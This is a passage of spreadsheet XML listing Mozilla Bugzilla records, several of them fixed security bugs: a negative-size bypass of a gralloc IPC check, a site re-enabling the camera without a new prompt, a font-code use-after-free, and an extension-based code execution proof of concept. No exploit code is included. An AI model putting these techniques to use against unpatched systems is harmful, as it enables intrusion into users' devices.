          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N552" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O552" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P552" t="inlineStr">
        <is>
          <t>[b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q552" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R552" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S552" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T552" t="n">
        <v>1</v>
      </c>
      <c r="U552" t="n">
        <v>0</v>
      </c>
      <c r="V552" t="n">
        <v>28</v>
      </c>
      <c r="W552" t="inlineStr">
        <is>
          <t>Created attachment 8580310
logfile from the hooks (values are little endian)
The upper bound check of the 'width' and 'height' field[1] can be bypassed using negative values that are supplied by a malicious child through the IPC message 'Msg_AllocateGrallocBuffer' in the field 'size'. The assembler code for the mentioned checks looks like this (flame device):
&gt; cmp.w r3, #4096
&gt; bgt.n &lt;destination&gt;
According to the ARM Reference Manual 'bgt' is a signed compare. I verified it using gdb. To modify the IPC message I used my hooking engine to hook the Pickle::Read* functions inside the b2g process at runtime and swapped the values (similar to the faulty fuzzer). I supplied the log file from the hooks as an attachment.
'width' and 'height' (as well as the other two parameters) are used to allocate GPU memory, by creating a 'GraphicBuffer'[2] instance, the actual allocation happens inside a device specific library called 'gralloc.&lt;device&gt;.so' (for the flame it is called: 'gralloc.msm8610.so'[3])
I am not sure what impact this could have. I tested a couple of values for 'width' and 'height', when I set them both to 0xffffff00 then I get a NULL pointer deref:
&gt; ldr.w	r3, [r10]
with r10 being 0 [4]. But I don't know how this relates to the negative size of the graphic buffer. If I set the first value (I am missing the definition of the 'IntSize' struct so I can't tell whether it is the 'height' or 'width') to 0x80001100 and the second to 0x1000, so that the product of the two gives me a higher value than the allowed 4096 and 4096, the process freezes, gdb doesn't show anything, nothing responds and after a while the process is killed.
So that's what I got regarding the impact, but I assume we shouldn't allow negative values for width and the height.
[1] http://mxr.mozilla.org/mozilla-central/source/gfx/layers/ipc/SharedBufferManagerParent.cpp?rev=da8b000c08c6#223
[2] ./B2G/frameworks/native/libs/ui/GraphicBuffer.cpp
[3] ./B2G/hardware/qcom/display/libgralloc/gpu.cpp - gralloc_alloc(...)
[4] http://mxr.mozilla.org/mozilla-central/source/gfx/layers/client/TiledContentClient.cpp?rev=78dcb3a426f2#1222</t>
        </is>
      </c>
      <c r="X552" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="553">
      <c r="A553" t="n">
        <v>90379</v>
      </c>
      <c r="B553" t="inlineStr">
        <is>
          <t>2001-07-11 13:30:09 -0700</t>
        </is>
      </c>
      <c r="C553" t="inlineStr">
        <is>
          <t>M092 crash [@ nsParser::Parse]</t>
        </is>
      </c>
      <c r="D553" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:39 -0700</t>
        </is>
      </c>
      <c r="E553" t="n">
        <v>1</v>
      </c>
      <c r="F553" t="n">
        <v>1</v>
      </c>
      <c r="G553" t="n">
        <v>3</v>
      </c>
      <c r="H553" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I553" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J553" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K553" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L553" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M553" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N553" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O553" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P553" t="inlineStr">
        <is>
          <t>[band aid fix in hand][PDT+]</t>
        </is>
      </c>
      <c r="Q553" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R553" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S553" t="inlineStr">
        <is>
          <t>mozilla0.9.3</t>
        </is>
      </c>
      <c r="T553" t="n">
        <v>1</v>
      </c>
      <c r="U553" t="n">
        <v>0</v>
      </c>
      <c r="V553" t="n">
        <v>18</v>
      </c>
      <c r="W553" t="inlineStr">
        <is>
          <t>I need some help sending this to the right component. M092 talkback reports are 
showing a handful of crashes at this signature. (Comments below.) 
Stack Trace: 
         nsParser::Parse        
[d:\builds\seamonkey\mozilla\htmlparser\src\nsParser.cpp  line
1880]
         nsHTMLDocument::WriteCommon
[d:\builds\seamonkey\mozilla\content\html\document\src\nsHTMLDocument.cpp  line
2329]
         nsHTMLDocument::ScriptWriteCommon
[d:\builds\seamonkey\mozilla\content\html\document\src\nsHTMLDocument.cpp  line
2428]
         nsHTMLDocument::Write
[d:\builds\seamonkey\mozilla\content\html\document\src\nsHTMLDocument.cpp  line
2452]
         XPTC_InvokeByIndex
[d:\builds\seamonkey\mozilla\xpcom\reflect\xptcall\src\md\win32\xptcinvoke.cpp 
line 139]
         XPCWrappedNative::CallMethod
[d:\builds\seamonkey\mozilla\js\src\xpconnect\src\xpcwrappednative.cpp  line
1883]
         XPC_WN_CallMethod
[d:\builds\seamonkey\mozilla\js\src\xpconnect\src\xpcwrappednativejsops.cpp 
line 1253]
         js_Invoke      [d:\builds\seamonkey\mozilla\js\src\jsinterp.c  line 
809]
         js_Interpret   [d:\builds\seamonkey\mozilla\js\src\jsinterp.c  line 
2703]
         js_Invoke      [d:\builds\seamonkey\mozilla\js\src\jsinterp.c  line 
825]
         js_Interpret   [d:\builds\seamonkey\mozilla\js\src\jsinterp.c  line 
2703]
         js_Invoke      [d:\builds\seamonkey\mozilla\js\src\jsinterp.c  line 
825]
         js_InternalInvoke      [d:\builds\seamonkey\mozilla\js\src\jsinterp.c  
line 897]
         JS_CallFunctionValue   [d:\builds\seamonkey\mozilla\js\src\jsapi.c  
line 3322]
         nsJSContext::CallEventHandler
[d:\builds\seamonkey\mozilla\dom\src\base\nsJSEnvironment.cpp  line 944]
         nsJSEventListener::HandleEvent
[d:\builds\seamonkey\mozilla\dom\src\events\nsJSEventListener.cpp  line 140]
         nsEventListenerManager::HandleEventSubType
[d:\builds\seamonkey\mozilla\content\events\src\nsEventListenerManager.cpp  line
1162]
         nsEventListenerManager::HandleEvent
[d:\builds\seamonkey\mozilla\content\events\src\nsEventListenerManager.cpp  line
1837]
         GlobalWindowImpl::HandleDOMEvent
[d:\builds\seamonkey\mozilla\dom\src\base\nsGlobalWindow.cpp  line 602]
         DocumentViewerImpl::LoadComplete
[d:\builds\seamonkey\mozilla\content\base\src\nsDocumentViewer.cpp  line 1126]
         nsDocShell::EndPageLoad
[d:\builds\seamonkey\mozilla\docshell\base\nsDocShell.cpp  line 3671]
         nsWebShell::EndPageLoad
[d:\builds\seamonkey\mozilla\docshell\base\nsWebShell.cpp  line 908]
         nsDocShell::OnStateChange
[d:\builds\seamonkey\mozilla\docshell\base\nsDocShell.cpp  line 3592]
         nsDocLoaderImpl::FireOnStateChange
[d:\builds\seamonkey\mozilla\uriloader\base\nsDocLoader.cpp  line 1095]
         nsDocLoaderImpl::doStopDocumentLoad
[d:\builds\seamonkey\mozilla\uriloader\base\nsDocLoader.cpp  line 734]
         nsDocLoaderImpl::DocLoaderIsEmpty
[d:\builds\seamonkey\mozilla\uriloader\base\nsDocLoader.cpp  line 632]
         nsDocLoaderImpl::OnStopRequest
[d:\builds\seamonkey\mozilla\uriloader\base\nsDocLoader.cpp  line 563]
         nsLoadGroup::RemoveRequest
[d:\builds\seamonkey\mozilla\netwerk\base\src\nsLoadGroup.cpp  line 517]
         PresShell::RemoveDummyLayoutRequest
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp  line 6104]
         PresShell::ProcessReflowCommands
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp  line 5890]
         ReflowEvent::HandleEvent
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp  line 5676]
         PL_HandleEvent [d:\builds\seamonkey\mozilla\xpcom\threads\plevent.c  
line 591]
         PL_ProcessPendingEvents        
[d:\builds\seamonkey\mozilla\xpcom\threads\plevent.c 
line 524]
         _md_EventReceiverProc  
[d:\builds\seamonkey\mozilla\xpcom\threads\plevent.c 
line 1072]
        Source File :
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/htmlparser/src/nsParser.cpp
line : 1880
     (32653363) URL: www.sparkasse-heidelberg.de
     (32653363) Comments: Crash while accessing the page. Sparkasse is a major
German bank that offers online banking via a Java Applet.For Germany
     (32418615) URL: www.netkult.com
     (32418615) Comments: Click on a Link</t>
        </is>
      </c>
      <c r="X553" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="554">
      <c r="A554" t="n">
        <v>1395819</v>
      </c>
      <c r="B554" t="inlineStr">
        <is>
          <t>2017-08-31 22:04:21 -0700</t>
        </is>
      </c>
      <c r="C554" t="inlineStr">
        <is>
          <t>Site can turn cam &amp; hw light back on without permission after cam light goes out, if it keeps recording audio</t>
        </is>
      </c>
      <c r="D554" t="inlineStr">
        <is>
          <t>2022-01-10 04:23:10 -0800</t>
        </is>
      </c>
      <c r="E554" t="n">
        <v>1</v>
      </c>
      <c r="F554" t="n">
        <v>1</v>
      </c>
      <c r="G554" t="n">
        <v>3</v>
      </c>
      <c r="H554" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I554" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J554" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K554" t="inlineStr">
        <is>
          <t>56 Branch</t>
        </is>
      </c>
      <c r="L554" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M554" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N554" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O554" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P554" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main89+]</t>
        </is>
      </c>
      <c r="Q554" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R554" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S554" t="inlineStr">
        <is>
          <t>89 Branch</t>
        </is>
      </c>
      <c r="T554" t="n">
        <v>1</v>
      </c>
      <c r="U554" t="n">
        <v>0</v>
      </c>
      <c r="V554" t="n">
        <v>25</v>
      </c>
      <c r="W554" t="inlineStr">
        <is>
          <t>STRs
 1. Open https://jsfiddle.net/jib1/mtLs2phL/2/
 2. When prompted, share camera and mic, but leave "Remember this decision" unchecked.
 3. Wait for self-view to appear (notice hardware camera light turns on).
 4. Wait 3 seconds, notice video disappears and camera hardware light goes out.
Expected result:
 5. After 6 more seconds, site prompts for camera and mic again. 
Actual result:
 5. After 6 more seconds, camera and light come back on without permission.
It's surprising that the site can turn off the camera hardware light and yet turn the camera back on later without permission.
For it to work, the site has to keep recording using the microphone the whole time, so there's a mic recording indicator in the tab the whole time if you noticed.
Still, even for users who notice this, we think they would not have guessed the camera could come back on after the hardware light and camera live indicator have both gone out.
We should fix this to re-prompt, which would be consistent with expectations, the spec [1], and with how gum(cam+mic) works after gum(mic).
This is a regression since 53 (bug 1270572) - Marking as hidden for now.
[1] https://w3c.github.io/mediacapture-main/getusermedia.html#dom-mediadevices-getusermedia() says:
"For the origin identified by originIdentifier, request permission for use of the devices, while considering all devices attached to a live MediaStreamTrack in the current browsing context to have permission status "granted", resulting in a set of provided media." - We think "devices" here refers to cam and mic as separate devices.</t>
        </is>
      </c>
      <c r="X554" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="555">
      <c r="A555" t="n">
        <v>1893891</v>
      </c>
      <c r="B555" t="inlineStr">
        <is>
          <t>2024-04-28 09:39:27 -0700</t>
        </is>
      </c>
      <c r="C555" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free gfx/thebes/gfxFontEntry.cpp in ForgetHashEntry after calloc failure on hb_object_create</t>
        </is>
      </c>
      <c r="D555" t="inlineStr">
        <is>
          <t>2024-09-18 19:40:49 -0700</t>
        </is>
      </c>
      <c r="E555" t="n">
        <v>1</v>
      </c>
      <c r="F555" t="n">
        <v>1</v>
      </c>
      <c r="G555" t="n">
        <v>3</v>
      </c>
      <c r="H555" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I555" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J555" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K555" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L555" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M555" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N555" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O555" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P555" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main126+]</t>
        </is>
      </c>
      <c r="Q555" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R555" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S555" t="inlineStr">
        <is>
          <t>127 Branch</t>
        </is>
      </c>
      <c r="T555" t="n">
        <v>1</v>
      </c>
      <c r="U555" t="n">
        <v>0</v>
      </c>
      <c r="V555" t="n">
        <v>20</v>
      </c>
      <c r="W555" t="inlineStr">
        <is>
          <t>Created attachment 9399060
ForgetHashEntry-heap-use-after-free-write-8.txt
On `hb_blob_create_or_fail` when the `hb_object_create&lt;hb_blob_t&gt;` calloc return nullptr, after `user_data` is freed, the `user_data` able to reused by `ForgetHashEntry` code.
## Steps to reproduce
1. Apply attached hb-blob-create-or-fail.patch
2. Compile Firefox with AddressSanitizer
3. Visit attached testcase-for-hb-blob-patch.html
4. Firefox crashed with AddressSanitizer: heap-use-after-free</t>
        </is>
      </c>
      <c r="X555" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="556">
      <c r="A556" t="n">
        <v>75145</v>
      </c>
      <c r="B556" t="inlineStr">
        <is>
          <t>2001-04-08 03:33:33 -0700</t>
        </is>
      </c>
      <c r="C556" t="inlineStr">
        <is>
          <t>Build failure with PSM</t>
        </is>
      </c>
      <c r="D556" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E556" t="n">
        <v>1</v>
      </c>
      <c r="F556" t="n">
        <v>1</v>
      </c>
      <c r="G556" t="n">
        <v>2</v>
      </c>
      <c r="H556" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I556" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J556" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K556" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L556" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M556" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N556" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O556" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P556" t="inlineStr"/>
      <c r="Q556" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R556" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S556" t="inlineStr">
        <is>
          <t>mozilla0.9</t>
        </is>
      </c>
      <c r="T556" t="n">
        <v>1</v>
      </c>
      <c r="U556" t="n">
        <v>0</v>
      </c>
      <c r="V556" t="n">
        <v>11</v>
      </c>
      <c r="W556" t="inlineStr">
        <is>
          <t>When configuring the lizard like this:
 ../../configure --with-gtk --with-xprint --disable-tests --enable-modules=psm
--enable-nspr-autoconf --enable-optimize --disable-debug --enable-ldap
--enable-mathml --enable-svg --disable-dtd-debug 
make BUILD_MODULES=psm
The build fails like this:
cd pkcs7; make libs
make[4]: Entering directory
/home/minfrin/src/mozilla/mozilla/build/unix/security/nss/lib/pkcs7'
gcc -o Linux2.2_ppc_glibc_PTH_OPT.OBJ/p7common.o -c -O2 -fPIC -DLINUX1_2
-D_XOPEN_SOURCE -DLINUX2_1 -ansi -Wall -pipe -DLINUX -Dlinux -D_POSIX_SOURCE
-D_BSD_SOURCE -DHAVE_STRERROR -DXP_UNIX -UDEBUG -DNDEBUG -D_REENTRANT
-I../../../../dist/Linux2.2_ppc_glibc_PTH_OPT.OBJ/include
-I/home/minfrin/src/mozilla/mozilla/build/unix/dist/Linux2.2_ppc_glibc_PTH_OPT.OBJ/include
-I/home/minfrin/src/mozilla/mozilla/build/unix/dist/Linux2.2_ppc_glibc_PTH_OPT.OBJ/public/security
-I/home/minfrin/src/mozilla/mozilla/build/unix/dist/Linux2.2_ppc_glibc_PTH_OPT.OBJ/private/security
-I/home/minfrin/src/mozilla/mozilla/build/unix/dist/Linux2.2_ppc_glibc_PTH_OPT.OBJ/public/security
-I/home/minfrin/src/mozilla/mozilla/build/unix/dist/Linux2.2_ppc_glibc_PTH_OPT.OBJ/public/dbm
p7common.c
In file included from secpkcs7.h:43,
                 from p7local.h:51,
                 from p7common.c:41:
/home/minfrin/src/mozilla/mozilla/build/unix/dist/Linux2.2_ppc_glibc_PTH_OPT.OBJ/public/security/seccomon.h:47:
prtypes.h: No such file or directory
[snip]
In file included from
/home/minfrin/src/mozilla/mozilla/build/unix/dist/Linux2.2_ppc_glibc_PTH_OPT.OBJ/public/security/secoidt.h:42,
                 from secpkcs7.h:46,
                 from p7local.h:51,
                 from p7common.c:41:
/home/minfrin/src/mozilla/mozilla/build/unix/dist/Linux2.2_ppc_glibc_PTH_OPT.OBJ/public/security/secitem.h:43:
plarena.h: No such file or directory
[snip]
/home/minfrin/src/mozilla/mozilla/build/unix/dist/Linux2.2_ppc_glibc_PTH_OPT.OBJ/public/security/secder.h:46:
prlong.h: No such file or directory
In file included from secpkcs7.h:48,
                 from p7local.h:51,
                 from p7common.c:41:
/home/minfrin/src/mozilla/mozilla/build/unix/dist/Linux2.2_ppc_glibc_PTH_OPT.OBJ/public/security/certt.h:41:
prclist.h: No such file or directory
The build was made on a nightly snapshot tree that had been brought up-to-date
with:
make -f mozilla/client.mk checkout
Building from a CVS checkout for me fails in the majority of cases with build
errors.
I have reported build bugs before which came back "works for me" - it's looking
likely that the problem is not with the build, but with the CVS checkout script
- the most likely cause is that the checkout script is checking out wrong
branches in the tree, so parts of Mozilla are being compiled against other parts
of Mozilla that do not match, or have fixes that are out of sync with each
other.</t>
        </is>
      </c>
      <c r="X556" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="557">
      <c r="A557" t="n">
        <v>1436482</v>
      </c>
      <c r="B557" t="inlineStr">
        <is>
          <t>2018-02-07 11:16:12 -0800</t>
        </is>
      </c>
      <c r="C557" t="inlineStr">
        <is>
          <t>Content scripts sometimes match the document URI rather than the principal URI</t>
        </is>
      </c>
      <c r="D557" t="inlineStr">
        <is>
          <t>2024-05-30 09:42:45 -0700</t>
        </is>
      </c>
      <c r="E557" t="n">
        <v>1</v>
      </c>
      <c r="F557" t="n">
        <v>1</v>
      </c>
      <c r="G557" t="n">
        <v>3</v>
      </c>
      <c r="H557" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I557" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J557" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K557" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L557" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M557" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N557" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O557" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P557" t="inlineStr">
        <is>
          <t>[adv-main60+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q557" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R557" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S557" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T557" t="n">
        <v>1</v>
      </c>
      <c r="U557" t="n">
        <v>0</v>
      </c>
      <c r="V557" t="n">
        <v>27</v>
      </c>
      <c r="W557" t="inlineStr">
        <is>
          <t>Created attachment 8949127
feedPreviewPoC.xpi
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
Steps to reproduce:
1. Install attached PoC extension
2. Once a page appears, click on the button.
3. A prompt will appear, paste by hitting (CTRL+V) then hit 'Enter'
4. Executable file is downloaded and executed.
This is just an example on one content handler, you can do the same with PDFs. Interestingly, JSON previewer cannot have code injected to it.
Actual results:
Injected JS into feed preview which results in RCE with user interaction. 
Video: https://youtu.be/TRrdmuaFzuQ
Expected results:
In bug 1422231 I described how the feed reader preview page can be clickjacked to run arbitrary executable files. Although these previews are not accessible to web, they are for webextensions. This is bad because usually these have other API's that may be used to escalate privilege.</t>
        </is>
      </c>
      <c r="X557" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="558">
      <c r="A558" t="n">
        <v>305126</v>
      </c>
      <c r="B558" t="inlineStr">
        <is>
          <t>2005-08-18 12:34:15 -0700</t>
        </is>
      </c>
      <c r="C558" t="inlineStr">
        <is>
          <t>Fix table locks after the removal of derive_groups</t>
        </is>
      </c>
      <c r="D558" t="inlineStr">
        <is>
          <t>2005-08-30 09:05:23 -0700</t>
        </is>
      </c>
      <c r="E558" t="n">
        <v>1</v>
      </c>
      <c r="F558" t="n">
        <v>1</v>
      </c>
      <c r="G558" t="n">
        <v>4</v>
      </c>
      <c r="H558" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I558" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J558" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K558" t="inlineStr">
        <is>
          <t>2.21</t>
        </is>
      </c>
      <c r="L558" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M558" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N558" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O558" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P558" t="inlineStr"/>
      <c r="Q558" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R558" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S558" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T558" t="n">
        <v>1</v>
      </c>
      <c r="U558" t="n">
        <v>0</v>
      </c>
      <c r="V558" t="n">
        <v>13</v>
      </c>
      <c r="W558" t="inlineStr">
        <is>
          <t>With the check-in of bug 304583, we will no longer need to lock tables in a few
places for derive_groups. At the least, we removed
DERIVE_GROUPS_TABLES_ALREADY_LOCKED from Flag.pm and whine.pl, so those will no
longer need those table locks (at least, not WRITE locks).</t>
        </is>
      </c>
      <c r="X558" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="559">
      <c r="A559" t="n">
        <v>365739</v>
      </c>
      <c r="B559" t="inlineStr">
        <is>
          <t>2007-01-02 19:58:57 -0800</t>
        </is>
      </c>
      <c r="C559" t="inlineStr">
        <is>
          <t>An error is thrown when attaching a too big file on bug creation</t>
        </is>
      </c>
      <c r="D559" t="inlineStr">
        <is>
          <t>2007-01-03 08:23:28 -0800</t>
        </is>
      </c>
      <c r="E559" t="n">
        <v>1</v>
      </c>
      <c r="F559" t="n">
        <v>1</v>
      </c>
      <c r="G559" t="n">
        <v>4</v>
      </c>
      <c r="H559" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I559" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J559" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K559" t="inlineStr">
        <is>
          <t>2.23.3</t>
        </is>
      </c>
      <c r="L559" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M559" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N559" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O559" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P559" t="inlineStr"/>
      <c r="Q559" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R559" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S559" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T559" t="n">
        <v>1</v>
      </c>
      <c r="U559" t="n">
        <v>0</v>
      </c>
      <c r="V559" t="n">
        <v>7</v>
      </c>
      <c r="W559" t="inlineStr">
        <is>
          <t>If you try to upload an invalid attachment while creating the bug, you'll see a warning saying to you go back and try to upload another one, but it files the bug.
1 - Use https://bugzilla-test.mozilla.org to make the test
2 - Start creating a new bug
3 - Add an attachment with more than 300kb
4 - Try to file the bug
What happens:
You will see a message telling you that the attachment could be uploaded (the default message), telling you to 'go back' and try again, the bug is filled.
What should happens:
1 - the bug shouldn't be filled, so it would be filled with the right attachment later, or
2 - the bug is filled and the message tells clearly that the user should go to the just created bug and attach the file there.
The way it's right now makes us to create duplicates of our own bugs when we can't attach the file we want.</t>
        </is>
      </c>
      <c r="X559" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="560">
      <c r="A560" t="n">
        <v>302100</v>
      </c>
      <c r="B560" t="inlineStr">
        <is>
          <t>2005-07-25 14:56:30 -0700</t>
        </is>
      </c>
      <c r="C560" t="inlineStr">
        <is>
          <t>Firefox 1.0.6 crashes when loading any page if PAC script uses eval [@ nsJSPrincipalsSubsume]</t>
        </is>
      </c>
      <c r="D560" t="inlineStr">
        <is>
          <t>2011-06-09 14:58:42 -0700</t>
        </is>
      </c>
      <c r="E560" t="n">
        <v>1</v>
      </c>
      <c r="F560" t="n">
        <v>1</v>
      </c>
      <c r="G560" t="n">
        <v>3</v>
      </c>
      <c r="H560" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I560" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J560" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K560" t="inlineStr">
        <is>
          <t>1.7 Branch</t>
        </is>
      </c>
      <c r="L560" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M560" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N560" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O560" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P560" t="inlineStr"/>
      <c r="Q560" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R560" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S560" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T560" t="n">
        <v>1</v>
      </c>
      <c r="U560" t="n">
        <v>0</v>
      </c>
      <c r="V560" t="n">
        <v>29</v>
      </c>
      <c r="W560" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: 1.06
I have been using 1.0 and (I think) 1.04 for some time with no problems.
I just downloaded and installed 1.06 in response to a "windows update"
message, or whatever it was.  The file I got is the same one I get from
your web site now, Firefox Setup 1.0.6.exe, 4,876,472 bytes, 19 July, 11:25. 
I did a standard install.  Windows 2000, SP4.  Whenever I try to access
any page at all (including www.mozilla.org), it crashes immediately at
location 004A6170, trying to read location 0x18.  This happens absolutely
solidly.  When I go back to version 1.0, things work.  Repeatedly uninstalled
and reinstalled back and forth between1.0 and 1.06.  1.0 always works,
1.06 always fails.
Reproducible: Always
Steps to Reproduce:
1.  Standard install of 1.06 for Windows 2000
2.  Try to open any web site
3.
Actual Results:  
crash at 0x004A6170, reading 0x18.</t>
        </is>
      </c>
      <c r="X560" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="561">
      <c r="A561" t="n">
        <v>445177</v>
      </c>
      <c r="B561" t="inlineStr">
        <is>
          <t>2008-07-14 10:17:10 -0700</t>
        </is>
      </c>
      <c r="C561" t="inlineStr">
        <is>
          <t>Crash [@ nsContentUtils::ComparePosition(nsINode*, nsINode*) ] with multipe identic ids</t>
        </is>
      </c>
      <c r="D561" t="inlineStr">
        <is>
          <t>2009-07-21 21:25:18 -0700</t>
        </is>
      </c>
      <c r="E561" t="n">
        <v>1</v>
      </c>
      <c r="F561" t="n">
